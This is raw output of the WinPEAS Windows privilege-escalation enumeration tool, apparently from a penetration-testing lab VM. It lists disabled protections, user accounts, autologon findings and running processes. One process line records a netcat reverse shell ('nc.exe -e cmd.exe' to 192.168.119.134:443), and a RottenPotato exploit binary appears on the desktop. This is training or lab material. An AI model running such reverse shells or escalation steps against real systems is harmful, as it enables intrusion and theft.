ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
[1;90m   Creating Dynamic lists, this could take a while, please wait...[0m
[1;90m   - Checking if domain...[0m
[1;90m   - Getting Win32_UserAccount info...[0m
[1;90m   - Creating current user groups list...[0m
[1;90m   - Creating active users list...[0m
[1;90m   - Creating disabled users list...[0m
[1;90m   - Admin users list...[0m
[34m     
             [1;32m*((,.,/((((((((((((((((((((/,  */               
      [1;32m,/*,..*((((((((((((((((((((((((((((((((((,           
    [1;32m,*/((((((((((((((((((/,  .*//((//**, .*(((((((*       
    [1;32m(((((((((((((((([34m**********/[1;32m########## [1;32m.(* ,(((((((   
    [1;32m(((((((((((/[34m********************/[1;32m####### [1;32m.(. (((((((
    [1;32m((((((..[34m******************[0m/@@@@@/[34m***/[1;32m###### [1;32m./(((((((
    [1;32m,,....[34m********************[0m@@@@@@@@@@[34m(***,[1;32m#### [1;32m.//((((((
    [1;32m, ,..[34m********************[0m/@@@@@%@@@@[34m/********[1;32m##[1;32m((/ /((((
    [1;32m..(([1;32m###########[34m*********[0m/%@@@@@@@@@[34m/************[1;32m,,..((((
    [1;32m.([1;32m##################(/[34m******[0m/@@@@@[34m/***************[1;32m.. /((
    [1;32m.([1;32m#########################(/[34m**********************[1;32m..*((
    [1;32m.([1;32m##############################(/[34m*****************[1;32m.,(((
    [1;32m.([1;32m###################################(/[34m************[1;32m..(((
    [1;32m.([1;32m#######################################([34m*********[1;32m..(((
    [1;32m.([1;32m#######(,.***.,(###################(..***.[34m*******[1;32m..(((
    [1;32m.([1;32m#######*(#####((##################((######/([34m*****[1;32m..(((
    [1;32m.([1;32m###################(/***********(##############([1;32m...(((
    [1;32m.(([1;32m#####################/*******(################[1;32m.((((((
    [1;32m.((([1;32m############################################[1;32m(..((((
    [1;32m..((([1;32m##########################################[1;32m(..(((((
    [1;32m....(([1;32m########################################[1;32m( .(((((
    [1;32m......(([1;32m####################################[1;32m( .((((((
    [1;32m((((((((([1;32m#################################[1;32m(../((((((
        [1;32m(((((((((/[1;32m##########################[1;32m(/..((((((
              [1;32m(((((((((/,.  ,*//////*,. ./(((((((((((((((.
                 [1;32m(((((((((((((((((((((((((((((/[0m

[1;33mADVISORY: [34mwinpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.

[33m  WinPEAS [1;32mv1.1[0m[33m by carlospolop[0m

[33m  [+] [1;32mLegend:[0m
[1;31m         Red[1;37m                Indicates a special privilege over an object or something is misconfigured[0m
[1;32m         Green[1;37m              Indicates that some protection is enabled or something is well configured[0m
[36m         Cyan[1;37m               Indicates active users[0m
[34m         Blue[1;37m               Indicates disabled users[0m
[1;33m         LightYellow[1;37m        Indicates links[0m

[33m   [?] [1;34mYou can find a Windows local PE Checklist here: [1;33mhttps://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation[0m


[1;36m  ==========================================([0m[33mSystem Information[1;36m)==========================================[0m

[33m  [+] [1;32mBasic System Information[0m
[33m   [?] [1;34mCheck if the Windows versions is vulnerable to some known exploit [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits[0m
[1;37m    Hostname: [0mBethany
[1;37m    ProductName: [0mWindows 8.1 Enterprise
[1;37m    EditionID: [0mEnterprise
[1;37m    ReleaseId: [0m
[1;37m    BuildBranch: [0m
[1;37m    CurrentMajorVersionNumber: [0m
[1;37m    CurrentVersion: [0m6.3
[1;37m    Architecture: [0mAMD64
[1;37m    ProcessorCount: [0m3
[1;37m    SystemLang: [0men-US
[1;37m    KeyboardLang: [0mEnglish (United States)
[1;37m    TimeZone: [0m(UTC-08:00) Pacific Time (US & Canada)
[1;37m    IsVirtualMachine: [0m[0m[1;31mTrue[0m
[1;37m    Current Time: [0m3/25/2021 9:00:18 AM
[1;37m    HighIntegrity: [0mFalse
[1;37m    PartOfDomain: [0mFalse
[1;37m    Hotfixes: [0m[1;32mKB2899189_Microsoft-Windows-CameraCodec-Package, KB2868626, KB2883200, KB2887595, KB2900986, KB2903939, KB2911106, KB2919355, KB2919394, KB2920189, KB2928680, KB2934520, KB2954879, KB2961072, KB2961908, KB2962806, KB2967917, KB2973351, KB2975061, KB2976978, KB2977765, KB2978041, KB2978126, KB2979576, KB2980654, KB2989930, KB2990967, KB2994290, KB3000850, KB3003057, KB3003667, KB3004361, KB3004365, KB3004394, KB3006137, KB3008242, KB3012199, KB3012235, KB3012702, KB3013172, KB3013410, KB3013531, KB3013538, KB3013791, KB3014442, KB3015696, KB3016074, KB3018133, KB3018467, KB3019215, KB3019978, KB3020338, KB3020370, KB3021910, KB3022777, KB3023222, KB3024751, KB3024755, KB3025417, KB3029432, KB3029438, KB3029603, KB3029606, KB3029803, KB3030377, KB3030947, KB3032663, KB3033446, KB3034348, KB3035017, KB3035126, KB3035132, KB3035527, KB3036612, KB3037579, KB3037924, KB3038002, KB3038562, KB3041857, KB3042085, KB3042553, KB3043812, KB3044374, KB3044673, KB3045171, KB3045634, KB3045685, KB3045717, KB3045719, KB3045755, KB3045992, KB3045999, KB3046002, KB3046359, KB3046480, KB3046737, KB3047254, KB3047255, KB3048043, KB3048778, KB3049989, KB3053863, KB3054169, KB3054256, KB3054464, KB3055323, KB3055642, KB3056347, KB3059316, KB3059317, KB3060383, KB3060793, KB3061421, KB3061468, KB3061512, KB3061518, KB3062760, KB3063843, KB3064059, KB3065822, KB3065988, KB3067505, KB3069392, KB3070102, KB3072630, KB3072633, KB3074886, KB3075516, KB3079777, KB3079904, KB3168965, [0m

[33m  [?] [1;34mWindows vulns search powered by [1;31mWatson[1;34m(https://github.com/rasta-mouse/Watson)[0m
    OS Build Number: 9600
[1;32m   Windows version not supported
[0m

[33m  [+] [1;32mUser Environment Variables[0m
[33m   [?] [1;34mCheck for some passwords or keys in the env variables [1;33m[0m
[1;37m    COMPUTER[0m[1;31mNAME[0m: [0mBETHANY
[1;37m    USERPROFILE: [0mC:\Users\Bethany
[1;37m    HOMEPATH: [0m\Users\Bethany
[1;37m    LOCALAPPDATA: [0mC:\Users\Bethany\AppData\Local
[1;37m    PSModulePath: [0mC:\Windows\system32\WindowsPowerShell\v1.0\Modules\
[1;37m    PROCESSOR_ARCHITECTURE: [0mAMD64
[1;37m    Path: [0mC:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
[1;37m    CommonProgramFiles(x86): [0mC:\Program Files (x86)\Common Files
[1;37m    ProgramFiles(x86): [0mC:\Program Files (x86)
[1;37m    PROCESSOR_LEVEL: [0m23
[1;37m    LOGONSERVER: [0m\\BETHANY
[1;37m    PATHEXT: [0m.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
[1;37m    HOMEDRIVE: [0mC:
[1;37m    SystemRoot: [0mC:\Windows
[1;37m    ALLUSERSPROFILE: [0mC:\ProgramData
[1;37m    PUBLIC: [0mC:\Users\Public
[1;37m    FP_NO_HOST_CHECK: [0mNO
[1;37m    APPDATA: [0mC:\Users\Bethany\AppData\Roaming
[1;37m    PROCESSOR_REVISION: [0m0102
[1;37m    USER[0m[1;31mNAME[0m: [0mBethany
[1;37m    CommonProgramW6432: [0mC:\Program Files\Common Files
[1;37m    CommonProgramFiles: [0mC:\Program Files\Common Files
[1;37m    OS: [0mWindows_NT
[1;37m    USERDOMAIN_ROAMINGPROFILE: [0mBethany
[1;37m    PROCESSOR_IDENTIFIER: [0mAMD64 Family 23 Model 1 Stepping 2, AuthenticAMD
[1;37m    ComSpec: [0mC:\Windows\system32\cmd.exe
[1;37m    PROMPT: [0m$P$G
[1;37m    SystemDrive: [0mC:
[1;37m    TEMP: [0mC:\Users\Bethany\AppData\Local\Temp
[1;37m    ProgramFiles: [0mC:\Program Files
[1;37m    NUMBER_OF_PROCESSORS: [0m3
[1;37m    TMP: [0mC:\Users\Bethany\AppData\Local\Temp
[1;37m    ProgramData: [0mC:\ProgramData
[1;37m    ProgramW6432: [0mC:\Program Files
[1;37m    windir: [0mC:\Windows
[1;37m    USERDOMAIN: [0mBethany

[33m  [+] [1;32mSystem Environment Variables[0m
[33m   [?] [1;34mCheck for some passwords or keys in the env variables [1;33m[0m
[1;37m    ComSpec: [0mC:\Windows\system32\cmd.exe
[1;37m    FP_NO_HOST_CHECK: [0mNO
[1;37m    NUMBER_OF_PROCESSORS: [0m3
[1;37m    OS: [0mWindows_NT
[1;37m    Path: [0mC:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
[1;37m    PATHEXT: [0m.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
[1;37m    PROCESSOR_ARCHITECTURE: [0mAMD64
[1;37m    PROCESSOR_IDENTIFIER: [0mAMD64 Family 23 Model 1 Stepping 2, AuthenticAMD
[1;37m    PROCESSOR_LEVEL: [0m23
[1;37m    PROCESSOR_REVISION: [0m0102
[1;37m    PSModulePath: [0mC:\Windows\system32\WindowsPowerShell\v1.0\Modules\
[1;37m    TEMP: [0mC:\Windows\TEMP
[1;37m    TMP: [0mC:\Windows\TEMP
[1;37m    USER[0m[1;31mNAME[0m: [0mSYSTEM
[1;37m    windir: [0mC:\Windows

[33m  [+] [1;32mAudit Settings[0m
[33m   [?] [1;34mCheck what is being logged [1;33m[0m
[1;90m    Not Found[0m

[33m  [+] [1;32mWEF Settings[0m
[33m   [?] [1;34mWindows Event Forwarding, is interesting to know were are sent the logs [1;33m[0m
[1;90m    Not Found[0m

[33m  [+] [1;32mLAPS Settings[0m
[33m   [?] [1;34mIf installed, local administrator password is changed frequently and is restricted by ACL [1;33m[0m
[1;37m    LAPS Enabled: [0m[0m[1;31mLAPS not installed[0m

[33m  [+] [1;32mWdigest[0m
[33m   [?] [1;34mIf enabled, plain-text crds could be stored in LSASS [1;33mhttps://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#wdigest[0m
[1;32m    Wdigest is not enabled[0m

[33m  [+] [1;32mLSA Protection[0m
[33m   [?] [1;34mIf enabled, a driver is needed to read LSASS memory (If Secure Boot or UEFI, RunAsPPL cannot be disabled by deleting the registry key) [1;33mhttps://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#lsa-protection[0m
[1;31m    LSA Protection is not enabled[0m

[33m  [+] [1;32mCredentials Guard[0m
[33m   [?] [1;34mIf enabled, a driver is needed to read LSASS memory [1;33mhttps://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#credential-guard[0m
[1;31m    CredentialGuard is not enabled[0m

[33m  [+] [1;32mCached Creds[0m
[33m   [?] [1;34mIf > 0, credentials will be cached in the registry and accessible by SYSTEM user [1;33mhttps://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#cached-credentials[0m
[1;31m    cachedlogonscount is 10[0m

[33m  [+] [1;32mAV Information[0m
[1;32m    Some AV was detected, search for bypasses[0m
[1;37m    Name: [0mWindows Defender
[1;37m    ProductEXE: [0m%ProgramFiles%\Windows Defender\MSASCui.exe
[1;37m    pathToSignedReportingExe: [0m%ProgramFiles%\Windows Defender\MsMpeng.exe

[33m  [+] [1;32mUAC Status[0m
[33m   [?] [1;34mIf you are in the Administrators group check how to bypass the UAC [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access[0m
[1;37m    ConsentPromptBehaviorAdmin: [0m0 - [0m[1;31mNo prompting[0m
[1;37m    EnableLUA: [0m0
[1;37m    LocalAccountTokenFilterPolicy: [0m1
[1;37m    FilterAdministratorToken: [0m0
[1;31m      [*] EnableLUA != 1, UAC policies disabled.
      [+] Any local account can be used for lateral movement.[0m

[33m  [+] [1;32mPowerShell Settings[0m
[1;37m    PowerShell v2 Version: [0m2.0
[1;37m    PowerShell v5 Version: [0m4.0
[1;37m    Transcription Settings: [0m
[1;37m    Module Logging Settings: [0m
[1;37m    Scriptblock Logging Settings: [0m
[1;37m    [0m[1;31mPS history file: [0m[0m
[1;37m    [0m[1;31mPS history size: [0m[0m

[33m  [+] [1;32mPS default transcripts history[0m
[33m    [i] [1;34mRead the PS history inside these files (if any)[0m

[33m  [+] [1;32mPowershell Console Host History[0m

[33m  [+] [1;32mHKCU Internet Settings[0m
[1;37m    User Agent: [0mMozilla/4.0 (compatible; MSIE 8.0; Win32)
[1;37m    IE5_UA_Backup_Flag: [0m5.0
[1;37m    ZonesSecurityUpgrade: [0mSystem.Byte[]
[1;37m    EmailName: [0mUser@
[1;37m    AutoConfigProxy: [0mwininet.dll
[1;37m    MimeExclusionListForCache: [0mmultipart/mixed multipart/x-mixed-replace multipart/x-byteranges 
[1;37m    WarnOnPost: [0mSystem.Byte[]
[1;37m    UseSchannelDirectly: [0mSystem.Byte[]
[1;37m    EnableHttp1_1: [0m1
[1;37m    UrlEncoding: [0m0
[1;37m    SecureProtocols: [0m2688
[1;37m    PrivacyAdvanced: [0m0
[1;37m    DisableCachingOfSSLPages: [0m0
[1;37m    WarnonZoneCrossing: [0m0
[1;37m    CertificateRevocation: [0m1
[1;37m    EnableNegotiate: [0m1
[1;37m    MigrateProxy: [0m1
[1;37m    ProxyEnable: [0m0
[1;37m    SyncMode5: [0m3

[33m  [+] [1;32mHKLM Internet Settings[0m
[1;37m    CodeBaseSearchPath: [0mCODEBASE
[1;37m    EnablePunycode: [0m1
[1;37m    WarnOnIntranet: [0m1
[1;37m    MinorVersion: [0m0
[1;37m    ActiveXCache: [0mC:\Windows\Downloaded Program Files

[33m  [+] [1;32mDrives Information[0m
[33m   [?] [1;34mRemember that you should search more info inside the other drives [1;33m[0m
    C:\ (Type: Fixed)(Volume label: HDD)(Filesystem: NTFS)(Available space: 13 GB)([0m[1;31mPermissions: Authenticated Users [AppendData/CreateDirectories])[0m
    D:\ (Type: CDRom)

[33m  [+] [1;32mChecking WSUS[0m
[33m   [?] [1;34m [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus[0m
[1;90m    Not Found[0m

[33m  [+] [1;32mChecking AlwaysInstallElevated[0m
[33m   [?] [1;34m [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated[0m
[1;32m    AlwaysInstallElevated isn't available[0m


[1;36m  ===========================================([0m[33mUsers Information[1;36m)===========================================[0m

[33m  [+] [1;32mUsers[0m
[33m   [?] [1;34mCheck if you have some admin equivalent privileges [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups[0m
  Current user: [0m[36m[0m[1:35mBethany[0m[0m
  Current groups: Domain Users, Everyone, Users, Interactive, Console Logon, Authenticated Users, This Organization, Local account, Local, NTLM Authentication
[1;90m   =================================================================================================[0m

    [0m[36m[0m[1:35mBethany[0m[0m\[0m[1;31mAdministrator[0m([0m[34mDisabled[0m): Built-in account for administering the computer/domain
        |->Groups: [0m[1;31mAdministrator[0ms
        |->Password: CanChange-[0m[1;31mNotExpi[0m-Req

    [0m[36m[0m[1:35mBethany[0m[0m\[0m[36m[0m[1;31malice[0m[0m
        |->Groups: [0m[1;31mAdministrator[0ms
        |->Password: CanChange-[0m[1;31mNotExpi[0m-NotReq

    [0m[36m[0m[36m[0m[1:35m[0m[1:35mBethany[0m[0m[0m[0m\[0m[36m[0m[36m[0m[1:35m[0m[1:35mBethany[0m[0m[0m[0m
        |->Groups: Users
        |->Password: CanChange-[0m[1;31mNotExpi[0m-Req

    [0m[36m[0m[1:35mBethany[0m[0m\[0m[34mGuest[0m([0m[34mDisabled[0m): Built-in account for guest access to the computer/domain
        |->Groups: [0m[34mGuest[0ms
        |->Password: [0m[1;31mNotChange[0m-[0m[1;31mNotExpi[0m-NotReq


[33m  [+] [1;32mCurrent Token privileges[0m
[33m   [?] [1;34mCheck if you can escalate privilege using some enabled token [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#token-manipulation[0m
[1;37m    SeShutdownPrivilege: [0mDISABLED
[1;37m    SeChangeNotifyPrivilege: [0mSE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
[1;37m    SeUndockPrivilege: [0mDISABLED
[1;37m    SeIncreaseWorkingSetPrivilege: [0mDISABLED
[1;37m    SeTimeZonePrivilege: [0mDISABLED

[33m  [+] [1;32mClipboard text[0m
[1;31m[0m

[33m  [+] [1;32mLogged users[0m
    IIS APPPOOL\DefaultAppPool
    [0m[36m[0m[36m[0m[1:35m[0m[1:35mBethany[0m[0m[0m[0m\[0m[36m[0m[36m[0m[1:35m[0m[1:35mBethany[0m[0m[0m[0m
    [0m[36m[0m[1:35mBethany[0m[0m\[0m[36m[0m[1;31malice[0m[0m

[33m  [+] [1;32mRDP Sessions[0m
[1;90m    SessID    pSessionName   pUserName      pDomainName              State     SourceIP[0m
    1         Console        [0m[36m[0m[36m[0m[1:35m[0m[1:35mBethany[0m[0m[0m[0m        [0m[36m[0m[36m[0m[1:35m[0m[1:35mBethany[0m[0m[0m[0m                  Active    

[33m  [+] [1;32mEver logged users[0m
    IIS APPPOOL\DefaultAppPool
    [0m[36m[0m[36m[0m[1:35m[0m[1:35mBethany[0m[0m[0m[0m\[0m[36m[0m[36m[0m[1:35m[0m[1:35mBethany[0m[0m[0m[0m
    [0m[36m[0m[1:35mBethany[0m[0m\[0m[36m[0m[1;31malice[0m[0m

[33m  [+] [1;32mHome folders found[0m
[1;32m    C:\Users\alice[0m
[1;32m    C:\Users\All Users[0m
[1;31m    C:\Users\Bethany : Bethany [AllAccess][0m
[1;32m    C:\Users\Default[0m
[1;32m    C:\Users\Default User[0m
[1;32m    C:\Users\DefaultAppPool[0m
[1;31m    C:\Users\Public : Interactive [WriteData/CreateFiles], Bethany [AllAccess][0m

[33m  [+] [1;32mLooking for AutoLogon credentials[0m
[1;31m    Some AutoLogon credentials were found!![0m
    DefaultDomainName             :  BETHANY
    DefaultUserName               :  bethany

[33m  [+] [1;32mPassword Policies[0m
[33m   [?] [1;34mCheck for a possible brute-force [1;33m[0m
[1;37m    Domain: [0mBuiltin
[1;37m    SID: [0mS-1-5-32
[1;37m    MaxPasswordAge: [0m42.22:47:31.7437440
[1;37m    MinPasswordAge: [0m00:00:00
[1;37m    MinPasswordLength: [0m0
[1;37m    PasswordHistoryLength: [0m0
[1;37m    PasswordProperties: [0m0
[1;90m   =================================================================================================[0m

[1;37m    Domain: [0m[0m[36m[0m[1:35mBethany[0m[0m
[1;37m    SID: [0mS-1-5-21-471342483-1622715373-4132421626
[1;37m    MaxPasswordAge: [0m42.00:00:00
[1;37m    MinPasswordAge: [0m00:00:00
[1;37m    MinPasswordLength: [0m0
[1;37m    PasswordHistoryLength: [0m0
[1;37m    PasswordProperties: [0m0
[1;90m   =================================================================================================[0m



[1;36m  =======================================([0m[33mProcesses Information[1;36m)=======================================[0m

[33m  [+] [1;32mInteresting Processes -non Microsoft-[0m
[33m   [?] [1;34mCheck if any interesting proccesses for memmory dump or if you could overwrite some binary running [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes[0m
    conhost(3908)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(3436)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(3432)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(4292)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(5152)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(3856)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    rundll32(3424)[[0m[1;32mC:\Windows\System32\rundll32.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: [0m[1;32mC:\Windows\System32\rundll32.exe [0mC:\Windows\System32\FirewallControlPanel.dll,ShowNotificationDialog /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "C:\users\bethany\desktop\msfrottenpotato.exe"
[1;90m   =================================================================================================[0m

    OpenWith(2992)[[0m[1;32mC:\Windows\system32\OpenWith.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: [0m[1;32mC:\Windows\system32\OpenWith.exe [0m-Embedding
[1;90m   =================================================================================================[0m

    cmd(4284)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(5144)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(5632)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    powershell(3416)[[0m[1;32mC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: powershell
[1;90m   =================================================================================================[0m

    vmtoolsd(2984)[[0m[1;32mC:\Program Files\VMware\VMware Tools\vmtoolsd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
[1;90m   =================================================================================================[0m

    conhost(2120)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(5136)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(4704)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(4700)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(4268)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(2540)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(3916)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(4692)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(4256)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(3824)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(2960)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(5872)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(2200)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(5968)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(2948)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(1224)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    nc(4236)[[0m[1;31mC:\Users\Public\nc.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [0m[1;31mPermissions:[0m[1:35m Bethany[0m [AllAccess], Interactive [WriteData/CreateFiles][0m
    [0m[1;31mPossible DLL Hijacking folder: C:\Users\Public (Interactive [WriteData/CreateFiles],[0m[1:35m Bethany[0m [AllAccess])[0m
    [1;37mCommand Line: "C:\Users\Public\nc.exe" -e cmd.exe 192.168.119.134 443
[1;90m   =================================================================================================[0m

    conhost(3372)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(784)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(4000)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(4656)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(4652)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(2064)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(2924)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(3784)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(3352)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(1268)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(4212)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(3144)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(2916)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(4208)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(1620)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
